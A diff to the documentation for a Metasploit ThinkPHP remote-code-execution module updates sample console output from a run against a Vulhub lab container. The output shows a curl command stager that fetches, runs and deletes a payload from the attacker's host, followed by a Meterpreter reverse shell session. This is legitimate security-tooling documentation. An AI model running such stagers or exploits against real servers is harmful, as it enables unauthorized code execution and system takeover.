documentation/modules/exploit/unix/webapp/thinkphp_rce.md

```diff
@@ -118,30 +115,27 @@ meterpreter >
 ### ThinkPHP 5.0.23 from [Vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce)
 
 ```
-msf5 exploit(unix/webapp/thinkphp_rce) > set rport 8081
-rport => 8081
 msf5 exploit(unix/webapp/thinkphp_rce) > run
 
 [*] Started reverse TCP handler on 192.168.1.3:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [+] The target appears to be vulnerable. ThinkPHP 5.0.23 is a vulnerable version.
 [*] Targeting ThinkPHP 5.0.23 automatically
-[*] Using URL: http://0.0.0.0:8888/zD3iTDja
-[*] Local IP: http://192.168.1.3:8888/zD3iTDja
-[*] Generated command stager: ["curl -so /tmp/XnysdYyf http://192.168.1.3:8888/zD3iTDja;chmod +x /tmp/XnysdYyf;/tmp/XnysdYyf;rm -f /tmp/XnysdYyf"]
-[*] Executing command: curl -so /tmp/XnysdYyf http://192.168.1.3:8888/zD3iTDja;chmod +x /tmp/XnysdYyf;/tmp/XnysdYyf;rm -f /tmp/XnysdYyf
-[*] Client 192.168.1.3 (curl/7.52.1) requested /zD3iTDja
+[*] Using URL: http://0.0.0.0:8888/hVN9Y2ju
+[*] Local IP: http://192.168.1.3:8888/hVN9Y2ju
+[*] Generated command stager: ["curl -so /tmp/tHWxdQqn http://192.168.1.3:8888/hVN9Y2ju;chmod +x /tmp/tHWxdQqn;/tmp/tHWxdQqn;rm -f /tmp/tHWxdQqn"]
+[*] Executing command: curl -so /tmp/tHWxdQqn http://192.168.1.3:8888/hVN9Y2ju;chmod +x /tmp/tHWxdQqn;/tmp/tHWxdQqn;rm -f /tmp/tHWxdQqn
+[*] Client 192.168.1.3 (curl/7.52.1) requested /hVN9Y2ju
 [*] Sending payload to 192.168.1.3 (curl/7.52.1)
-[*] Transmitting intermediate stager...(126 bytes)
-[*] Sending stage (3012516 bytes) to 192.168.1.3
-[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.3:64482) at 2020-04-13 01:03:29 -0500
+[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.3:55145) at 2020-05-01 04:26:44 -0500
+[+] Successfully executed command: curl -so /tmp/tHWxdQqn http://192.168.1.3:8888/hVN9Y2ju;chmod +x /tmp/tHWxdQqn;/tmp/tHWxdQqn;rm -f /tmp/tHWxdQqn
 [*] Command Stager progress - 100.00% done (112/112 bytes)
 [*] Server stopped.
 
 meterpreter > getuid
-Server username: no-user @ 9a6301c3c31d (uid=33, gid=33, euid=33, egid=33)
+Server username: no-user @ b4be164434d3 (uid=33, gid=33, euid=33, egid=33)
 meterpreter > sysinfo
-Computer     : 172.22.0.2
+Computer     : 172.18.0.2
```

Comment:
If you paid attention to the IPs here, you can tell I tested this version first, then went back and tested the first scenario. (: